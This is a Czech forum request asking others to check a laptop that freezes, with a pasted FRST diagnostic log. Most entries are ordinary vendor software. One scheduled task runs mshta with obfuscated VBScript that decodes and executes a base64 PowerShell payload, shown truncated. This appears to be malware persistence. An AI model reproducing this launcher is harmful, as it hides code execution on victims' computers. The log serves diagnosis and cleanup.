Kontrola notebooku

[samsungs6edge]

Dobrý den, mohl by prosím někdo zkontrolovat můj notebook, poslední dobou se mě zdá, že se někdy sekne. Děkuji

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 06-03-2025
Ran by LOQ (administrator) on DESKTOP-LLM0I6O (LENOVO 83GS) (09-03-2025 15:28:55)
Running from C:\Users\LOQ\Desktop\FRST64.exe
Loaded Profiles: LOQ
Platform: Microsoft Windows 11 Enterprise Version 23H2 22631.4890 (X64) Language: Čeština (Česko)
Default browser: Chrome
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\LenovoVantageService.exe ->) (Lenovo -> Lenovo) C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\LenovoVantage-(DeviceSettingsSystemAddin).exe
(C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\LenovoVantageService.exe ->) (Lenovo -> Lenovo) C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\LenovoVantage-(GenericMessagingAddin).exe
(C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\LenovoVantageService.exe ->) (Lenovo -> Lenovo) C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\LenovoVantage-(GenericTelemetryAddin).exe
(C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\LenovoVantageService.exe ->) (Lenovo -> Lenovo) C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\LenovoVantage-(LenovoGamingSystemAddin).exe
(C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\LenovoVantageService.exe ->) (Lenovo -> Lenovo) C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\LenovoVantage-(LenovoServiceBridgeAddin).exe
(C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\LenovoVantageService.exe ->) (Lenovo -> Lenovo) C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\LenovoVantage-(VantageCoreAddin).exe
(cmd.exe ->) (Lenovo (Beijing) Limited -> Lenovo Group Limited) C:\Users\LOQ\AppData\Local\Programs\Lenovo\Lenovo Service Bridge\LSB.exe
(DriverStore\FileRepository\ipf_cpu.inf_amd64_fe2967a6eb0d3a7d\ipf_uf.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_fe2967a6eb0d3a7d\ipf_helper.exe
(DriverStore\FileRepository\lenovofnandfunctionkeys.inf_amd64_835bd694f1ef7154\LenovoUtilityService.exe ->) (Lenovo -> Lenovo) C:\Windows\System32\DriverStore\FileRepository\lenovofnandfunctionkeys.inf_amd64_835bd694f1ef7154\FnHotkeyCapsLKNumLK.exe
(DriverStore\FileRepository\lenovofnandfunctionkeys.inf_amd64_835bd694f1ef7154\LenovoUtilityService.exe ->) (Lenovo -> Lenovo) C:\Windows\System32\DriverStore\FileRepository\lenovofnandfunctionkeys.inf_amd64_835bd694f1ef7154\FnHotkeyUtility.exe
(explorer.exe ->) () [File not signed] C:\Users\LOQ\Desktop\mp4joiner_x64.exe <6>
(explorer.exe ->) (FxSound, LLC -> FxSound LLC) C:\Program Files\FxSound LLC\FxSound\FxSound.exe
(Lenovo -> Lenovo) C:\ProgramData\Lenovo\Vantage\Addins\SmartColorAddin\1.0.4.129\x64\SEGameTool.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\cmd.exe
(NahimicService.exe ->) (SteelSeries France SASU -> Nahimic) C:\Windows\System32\NahimicAPO4Volume.exe
(services.exe ->) (Certida, LLC -> Certida LLC) C:\Program Files (x86)\VyprVPN\VyprVPNService.exe
(services.exe ->) (FOR TESTING ONLY - IPF_PreProd_Cert -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\dtt_sw.inf_amd64_683097297aaa9bb4\ipfsvc.exe
(services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_8a3f88e34f6b8385\jhi_service.exe
(services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_56d6937614131142\OneApp.IGCC.WinService.exe
(services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_75394611ca221846\IntelCpHDCPSvc.exe
(services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_fe2967a6eb0d3a7d\ipf_uf.exe
(services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\mewmiprov.inf_amd64_58a0ea2de06916f7\WMIRegistrationService.exe
(services.exe ->) (Intel Corporation -> Intel(R) Corporation) C:\Windows\SysWOW64\XtuService.exe
(services.exe ->) (Intel Corporation -> Intel) C:\Windows\System32\DriverStore\FileRepository\intcoed.inf_amd64_6fa60c4b09f4675e\AS\IAS\IntelAudioService.exe
(services.exe ->) (Lenovo -> Lenovo) C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\LenovoVantageService.exe
(services.exe ->) (Lenovo -> Lenovo) C:\Windows\System32\DriverStore\FileRepository\lenovofnandfunctionkeys.inf_amd64_835bd694f1ef7154\LenovoUtilityService.exe
(services.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\Locator.exe
(services.exe ->) (Microsoft Windows Hardware Compatibility Publisher -> Realtek Semiconductor Corp.) C:\Windows\RtkBtManServ.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25010.11-0\MpDefenderCoreService.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25010.11-0\MsMpEng.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25010.11-0\NisSrv.exe
(services.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nvlt.inf_amd64_49d0373b6410e907\Display.NvContainer\NVDisplay.Container.exe <2>
(services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_9366beb5d0043df3\RtkAudUService64.exe <2>
(services.exe ->) (SteelSeries France SASU -> Nahimic) C:\Windows\System32\NahimicService.exe
(services.exe ->) (思必驰科技股份有限公司 -> AI Speech Co., Ltd.) C:\Windows\System32\DriverStore\FileRepository\aispeechapo.inf_amd64_c60dcb8babaf9b09\AISControlService.exe
(SteelSeries France SASU -> A-Volute) C:\Windows\System32\NhNotifSys.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\DataExchangeHost.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <3>
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtkAudUService] => C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_9366beb5d0043df3\RtkAudUService64.exe [1987544 2024-07-01] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKU\S-1-5-21-4161793325-174424039-3687507759-1001\...\Policies\Explorer: [DisallowRun] 1
HKU\S-1-5-21-4161793325-174424039-3687507759-1001\...\Policies\Explorer\DisallowRun: [1] DeviceCensus.exe
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe [2025-03-05] (Google LLC -> Google LLC)
IFEO\DeviceCensus.exe: [Debugger] C:\Windows\System32\taskkill.exe
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FxSound.lnk [2025-03-05]
ShortcutTarget: FxSound.lnk -> C:\Program Files\FxSound LLC\FxSound\FxSound.exe (FxSound, LLC -> FxSound LLC)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) =================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {E13D64C0-786B-4A01-9565-1EA5DFF38A6F} - System32\Tasks\FxSound\Update => C:\Program Files\FxSound LLC\FxSound\updater.exe [1268112 2025-02-25] (FxSound, LLC -> FxSound LLC)
Task: {7F8CC66E-F877-4CC7-A1E7-FFB40210944A} - System32\Tasks\GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem135.0.7023.0{5AE64154-5E84-48FA-B525-E36C559F38CD} => C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe [5745760 2025-02-19] (Google LLC -> Google LLC)
Task: {18666C41-5873-43C9-BB94-EB11D6B7BFCC} - System32\Tasks\Lenovo\Lenovo Service Bridge\S-1-5-21-4161793325-174424039-3687507759-1001 => C:\Users\LOQ\AppData\Local\Programs\Lenovo\Lenovo Service Bridge\LSBUpdater.exe [88584 2024-05-17] (Lenovo (Beijing) Limited -> Lenovo Group Limited)
Task: {E4FE5C9D-15C1-4156-9D78-3E6C1C791DF3} - System32\Tasks\Lenovo\LenovoNowLauncher => C:\Program Files (x86)\Lenovo\LenovoNow\x86\LenovoNow.exe [3559328 2025-02-07] (Lenovo -> Lenovo) -> C:\Program Files (x86)\Lenovo\LenovoNow\x86\/task
Task: {6C4E63A0-BFD2-420B-8F85-CB1C217162F6} - System32\Tasks\Lenovo\LenovoNowQuarterlyLaunch => C:\Program Files (x86)\Lenovo\LenovoNow\x86\LenovoNow.Task.exe [2360224 2025-02-07] (Lenovo -> Lenovo) -> C:\Program Files (x86)\Lenovo\LenovoNow\x86\/QuarterlyLaunch
Task: {FF8DF0D1-4694-4627-868F-4B7A26E8D58A} - System32\Tasks\Lenovo\LenovoNowTask => C:\Program Files (x86)\Lenovo\LenovoNow\x86\LenovoNow.Task.exe [2360224 2025-02-07] (Lenovo -> Lenovo) -> C:\Program Files (x86)\Lenovo\LenovoNow\x86\$(EventData)
Task: {857ED37E-82AF-4662-836B-1A3BA85F88F8} - System32\Tasks\Lenovo\Vantage\Lenovo.Vantage.ServiceMaintainance => C:\Windows\system32\sc.exe [98304 2022-05-07] (Microsoft Windows -> Microsoft Corporation) -> start LenovoVantageService
Task: {3A8E78A4-9746-4110-9C8B-F16AAB885A34} - System32\Tasks\Lenovo\Vantage\Schedule\BatteryGaugeAddinDailyScheduleTask => C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\ScheduleEventAction.exe [30152 2025-02-22] (Lenovo -> Lenovo)
Task: {45189725-4023-4401-9C02-B379FE74FA03} - System32\Tasks\Lenovo\Vantage\Schedule\DailyTelemetryTransmission => C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\ScheduleEventAction.exe [30152 2025-02-22] (Lenovo -> Lenovo)
Task: {6135B554-5088-43AE-B4CE-E4374A0EF8B2} - System32\Tasks\Lenovo\Vantage\Schedule\GenericMessagingAddin => C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\ScheduleEventAction.exe [30152 2025-02-22] (Lenovo -> Lenovo)
Task: {2312E667-B163-4FEA-906D-96A2F8FB1577} - System32\Tasks\Lenovo\Vantage\Schedule\HeartbeatAddinDailyScheduleTask => C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\ScheduleEventAction.exe [30152 2025-02-22] (Lenovo -> Lenovo)
Task: {518C246C-B429-4FB0-8F37-733B9FB299E6} - System32\Tasks\Lenovo\Vantage\Schedule\IdeaNotebookAddinDailyEvent => C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\ScheduleEventAction.exe [30152 2025-02-22] (Lenovo -> Lenovo)
Task: {E0264CFF-A651-488D-B95A-770EB53012B9} - System32\Tasks\Lenovo\Vantage\Schedule\Lenovo.Vantage.SmartPerformance.MonthlyReport => C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\ScheduleEventAction.exe [30152 2025-02-22] (Lenovo -> Lenovo)
Task: {1CC8B60C-69E0-4589-9A0F-3235C4B0E3D2} - System32\Tasks\Lenovo\Vantage\Schedule\LenovoCompanionAppAddinDailyScheduleTask => C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\ScheduleEventAction.exe [30152 2025-02-22] (Lenovo -> Lenovo)
Task: {BC685AEA-4D8D-4FA4-932A-1E0E02FBFA98} - System32\Tasks\Lenovo\Vantage\Schedule\LenovoSystemUpdateAddin_WeeklyTask => C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\ScheduleEventAction.exe [30152 2025-02-22] (Lenovo -> Lenovo)
Task: {8DB58D7A-FD80-4440-A6C7-3FC21E07209A} - System32\Tasks\Lenovo\Vantage\Schedule\NightChargeToastEvent => C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\ScheduleEventAction.exe [30152 2025-02-22] (Lenovo -> Lenovo)
Task: {6D454814-C25A-411C-AC87-6A87AA7EAB79} - System32\Tasks\Lenovo\Vantage\Schedule\SettingsWidgetAddinDailyScheduleTask => C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\ScheduleEventAction.exe [30152 2025-02-22] (Lenovo -> Lenovo)
Task: {F7E85D87-3A89-494B-BC38-64C964A66E33} - System32\Tasks\Lenovo\Vantage\Schedule\SmartPerformance.ExpireReminder => C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\ScheduleEventAction.exe [30152 2025-02-22] (Lenovo -> Lenovo)
Task: {625755AE-0F3D-46C5-941D-FBF11FE8F69D} - System32\Tasks\Lenovo\Vantage\Schedule\VantageCoreAddinIdleScheduleTask => C:\ProgramData\Lenovo\Vantage\Addins\VantageCoreAddin\1.0.0.190\x64\IdleScheduleEventAction.exe [143768 2025-01-18] (Lenovo -> )
Task: {6D46F461-7372-4D71-BC56-408FCB8DE088} - System32\Tasks\Lenovo\Vantage\Schedule\VantageCoreAddinWeekScheduleTask => C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\ScheduleEventAction.exe [30152 2025-02-22] (Lenovo -> Lenovo)
Task: {2E5D6E77-DCA5-42D3-A322-5E56BB5C34F1} - System32\Tasks\Lenovo\Vantage\StartupFixPlan => C:\Program Files (x86)\Lenovo\VantageService\4.2.24.0\\uninstall.exe /repair (No File)
Task: {F773F4F6-1A6D-44E6-9214-A8AEBFEE193F} - System32\Tasks\Maintenance Settings Control Panel\Maintenance Settings Control Panel => C:\Windows\system32\MShtA.exe [32768 2023-12-04] (Microsoft Windows -> Microsoft Corporation) -> vBSCripT:(cReAtEobjECt("wsCrIP"+"T.SHelL").rUn("pOwErshELl [sCRiPTblock]::cReaTe([TeXT.eNCoDing]::UTf8.GeTSTRinG([CoNVERT]::fRoMBASE64stRiNg('KFt0RVhULmVOY29ESU5HXTo6VVRmOC5nRXRzdHJpbmcoW2NvTnZFcnRdOjpmUk9tQkFzZTY0c3RyaU5nKChncCAoKCdISycrJ0xNOicrJ0JQM1MqJysnZUJQMycrJ1N5c3RlbScpLVJFcExhY0UgJ0JQMycsW2 (the data entry has 55 more characters).
Task: {E0F10DCF-44AD-40E8-9370-FB5DA59F93FB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (No File)
Task: {5FF0AB12-7EB1-4F55-A8F1-2D38AB7E1720} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25010.11-0\MpCmdRun.exe [1732816 2025-03-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {CA872A2F-BEB5-4FCD-B547-DC96C6B819A7} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25010.11-0\MpCmdRun.exe [1732816 2025-03-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {71ED81B9-60EF-45E5-9ABA-E6C8ACE84E43} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25010.11-0\MpCmdRun.exe [1732816 2025-03-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {3246B931-1F7A-4658-A86F-A18E23C6B35B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25010.11-0\MpCmdRun.exe [1732816 2025-03-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {B06C0E0C-BB73-4FB0-AE1B-05C52651ABC2} - System32\Tasks\Mozilla\Firefox Background Update S-1-5-21-4161793325-174424039-3687507759-1001 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\firefox.exe [682560 2025-03-06] (Mozilla Corporation -> Mozilla Corporation) -> C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\--MOZ_LOG sync,prependheader,timestamp,append,maxsize:1,Dump:5 --MOZ_LOG_FILE C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\backgroundupdate.moz_log --backgroundtask background (the data entry has 6 more characters).
Task: {54DE9AA1-7C8B-4876-894B-BC672D3EB1D3} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [34880 2025-03-06] (Mozilla Corporation -> Mozilla Foundation)
Task: {D28FC1B5-5B41-4341-996A-48F190393199} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [1277480 2024-12-18] (NVIDIA Corporation -> NVIDIA Corporation) -> C:\Program Files\NVIDIA Corporation\NvContainer\-d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {11A97E11-DE1A-44C7-A90E-86743B77317F} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3347496 2024-12-18] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {DBC83A07-70A3-496C-AFBB-6C3DB8AA5A61} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [646696 2024-12-18] (NVIDIA Corporation -> NVIDIA Corporation) -> C:\Program Files (x86)\NVIDIA Corporation\NvNode\--launcher=TaskScheduler
Task: {8A15EECD-8F17-4A9C-BF2C-6B8E84A0AF82} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1673768 2024-12-18] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {0C1AE3F1-9D2C-495A-B8F9-2FDF097B8550} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1673768 2024-12-18] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {E68CFF2E-C647-431E-AFCB-29816840D72B} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1673768 2024-12-18] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {AB74961F-5C26-47EC-8420-E663C1363EEF} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1673768 2024-12-18] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {5923020C-F6AC-4440-B9F8-2D1C2E00460D} - System32\Tasks\TVT\TVSUUpdateTask => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [1904536 2024-07-15] (Lenovo -> )
Task: {6242EF39-4D61-4794-B380-8207A5D0252A} - System32\Tasks\TVT\TVSUUpdateTask_UserLogOn => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [1904536 2024-07-15] (Lenovo -> )

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.5
Tcpip\..\Interfaces\{c4a9eaec-89ed-4d21-b05e-040078005a7f}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{f5d7951b-9712-44b6-ae19-2e47f54d5a0a}: [DhcpNameServer] 192.168.0.5
Tcpip\..\Interfaces\{f5d7951b-9712-44b6-ae19-2e47f54d5a0a}\4505: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{f5d7951b-9712-44b6-ae19-2e47f54d5a0a}\4505D2C496E6B6D223E2437486A7: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{f5d7951b-9712-44b6-ae19-2e47f54d5a0a}\4505F55374: [DhcpNameServer] 192.168.1.1

Edge:
=======
Edge Profile: C:\Users\LOQ\AppData\Local\Microsoft\Edge\User Data\Default [2025-01-13]
Edge Extension: (Dokumenty Google offline) - C:\Users\LOQ\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2025-01-13]hxxps://clients2.google.com/service/update2/crx
Edge Extension: (Edge relevant text changes) - C:\Users\LOQ\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha [2024-10-02]hxxps://edge.microsoft.com/extensionwebstorebase/v1/crx

FireFox:
========
FF DefaultProfile: fol4vnd9.default
FF ProfilePath: C:\Users\LOQ\AppData\Roaming\Mozilla\Firefox\Profiles\fol4vnd9.default [2024-10-08]
FF ProfilePath: C:\Users\LOQ\AppData\Roaming\Mozilla\Firefox\Profiles\csb02tm7.default-release [2025-03-09]
FF DownloadDir: D:\Ubuntu Server\Torrent

Chrome:
=======
CHR Profile: C:\Users\LOQ\AppData\Local\Google\Chrome\User Data\Default [2025-03-09]
CHR DownloadDir: D:\Stažené soubory
CHR Notifications: Default -> hxxps://www.facebook.com
CHR HomePage: Default -> hxxp://www.seznam.cz/
CHR StartupUrls: Default -> "hxxps://www.seznam.cz/"
CHR Extension: (Dokumenty Google offline) - C:\Users\LOQ\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2025-02-24]hxxps://clients2.google.com/service/update2/crx
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\LOQ\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2024-10-02]hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AISpeechService; C:\Windows\System32\DriverStore\FileRepository\aispeechapo.inf_amd64_c60dcb8babaf9b09\AISControlService.exe [322952 2024-11-02] (思必驰科技股份有限公司 -> AI Speech Co., Ltd.)
R2 dptftcs; C:\Windows\System32\DriverStore\FileRepository\dtt_sw.inf_amd64_683097297aaa9bb4\ipfsvc.exe [562040 2024-10-29] (FOR TESTING ONLY - IPF_PreProd_Cert -> Intel Corporation)
S2 Intel(R) Platform License Manager Service; C:\Windows\System32\DriverStore\FileRepository\iclsclient.inf_amd64_fc84dfa25a6a7727\lib\PlatformLicenseManagerService.exe [741488 2023-12-14] (Intel Corporation -> Intel(R) Corporation)
R2 IntelAudioService; C:\Windows\System32\DriverStore\FileRepository\intcoed.inf_amd64_6fa60c4b09f4675e\AS\IAS\IntelAudioService.exe [531048 2024-11-02] (Intel Corporation -> Intel)
R2 ipfsvc; C:\Windows\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_fe2967a6eb0d3a7d\ipf_uf.exe [3084992 2024-10-29] (Intel Corporation -> Intel Corporation)
R2 LenovoFnAndFunctionKeys; C:\Windows\System32\DriverStore\FileRepository\lenovofnandfunctionkeys.inf_amd64_835bd694f1ef7154\LenovoUtilityService.exe [180704 2024-12-05] (Lenovo -> Lenovo)
R2 LenovoVantageService; C:\Program Files (x86)\Lenovo\VantageService\4.2.85.0\LenovoVantageService.exe [34768 2025-02-22] (Lenovo -> Lenovo)
R2 MDCoreSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25010.11-0\MpDefenderCoreService.exe [1926976 2025-03-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 NahimicService; C:\Windows\system32\NahimicService.exe [1910192 2024-07-01] (SteelSeries France SASU -> Nahimic)
R2 NVDisplay.ContainerLocalSystem; C:\Windows\System32\DriverStore\FileRepository\nvlt.inf_amd64_49d0373b6410e907\Display.NvContainer\NVDisplay.Container.exe [1275552 2024-12-18] (NVIDIA Corporation -> NVIDIA Corporation)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [559368 2024-11-06] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 VyprVPN; C:\Program Files (x86)\VyprVPN\VyprVPNService.exe [421248 2024-12-08] (Certida, LLC -> Certida LLC)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25010.11-0\NisSrv.exe [4352456 2025-03-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25010.11-0\MsMpEng.exe [270056 2025-03-04] (Microsoft Windows Publisher -> Microsoft Corporation)
S2 uhssvc; "C:\Program Files\Microsoft Update Health Tools\uhssvc.exe" [X]

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BthA2dp; C:\Windows\System32\drivers\BthA2dp.sys [544768 2024-10-02] (Microsoft Corporation) [File not signed]
S3 BthHFEnum; C:\Windows\System32\drivers\bthhfenum.sys [188416 2024-10-02] (Microsoft Corporation) [File not signed]
S3 BTHMODEM; C:\Windows\System32\drivers\bthmodem.sys [106496 2022-05-07] (Microsoft Corporation) [File not signed]
S3 FBNetFilter; C:\Windows\System32\drivers\FBNetFlt.sys [60896 2024-07-24] (Lenovo -> Lenovo)
R3 FXVAD; C:\Windows\system32\drivers\fxvad.sys [326656 2022-05-30] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
R3 iaLPSS2_GPIO2_ADL; C:\Windows\System32\DriverStore\FileRepository\ialpss2_gpio2_adl.inf_amd64_6f8ae740d22247ce\iaLPSS2_GPIO2_ADL.sys [141288 2024-10-29] (Intel Corporation -> Intel Corporation)
R3 iaLPSS2_I2C_ADL; C:\Windows\System32\DriverStore\FileRepository\ialpss2_i2c_adl.inf_amd64_563fbcd35feb69a6\iaLPSS2_I2C_ADL.sys [211432 2024-10-29] (Intel Corporation -> Intel Corporation)
R3 ipf_acpi; C:\Windows\System32\DriverStore\FileRepository\ipf_acpi.inf_amd64_c4581e5c36b81f6c\ipf_acpi.sys [88656 2024-10-29] (Intel Corporation -> Intel Corporation)
R3 ipf_cpu; C:\Windows\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_fe2967a6eb0d3a7d\ipf_cpu.sys [88144 2024-10-29] (Intel Corporation -> Intel Corporation)
R3 ipf_lf; C:\Windows\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_fe2967a6eb0d3a7d\ipf_lf.sys [499392 2024-10-29] (Intel Corporation -> Intel Corporation)
R3 KslD; C:\Windows\System32\drivers\wd\KslD.sys [278944 2025-02-26] (Microsoft Windows -> Microsoft Corporation)
R3 NahimicBTLink; C:\Windows\System32\drivers\NahimicBTLink.sys [95856 2024-07-01] (A-Volute SAS -> Windows (R) Win 7 DDK provider)
R3 NahimicXVAD; C:\Windows\System32\drivers\NahimicXVAD.sys [95896 2024-07-01] (A-Volute SAS -> Windows (R) Win 7 DDK provider)
R3 Nahimic_Mirroring; C:\Windows\System32\drivers\Nahimic_Mirroring.sys [95896 2024-07-01] (A-Volute SAS -> Windows (R) Win 7 DDK provider)
R3 NvModuleTracker; C:\Windows\System32\DriverStore\FileRepository\nvmoduletracker.inf_amd64_ea6cec41fc5b2a8b\NvModuleTracker.sys [47240 2024-07-01] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvpcf; C:\Windows\System32\drivers\nvpcf.sys [237216 2024-12-18] (NVIDIA Corporation -> NVIDIA Corporation)
R3 rt68cx21; C:\Windows\System32\DriverStore\FileRepository\rt68cx21x64.inf_amd64_16d0e5f2b3759518\rt68cx21x64.sys [845256 2024-08-27] (Realtek Semiconductor Corp. -> Realtek)
S3 rtcx21; C:\Windows\System32\DriverStore\FileRepository\rtcx21x64.inf_amd64_516e5c9b75c49dc2\rtcx21x64.sys [539648 2022-05-06] (Microsoft Windows -> Realtek)
S3 tap0901; C:\Windows\System32\drivers\tap0901.sys [41000 2024-12-04] (Microsoft Windows Hardware Compatibility Publisher -> The OpenVPN Project)
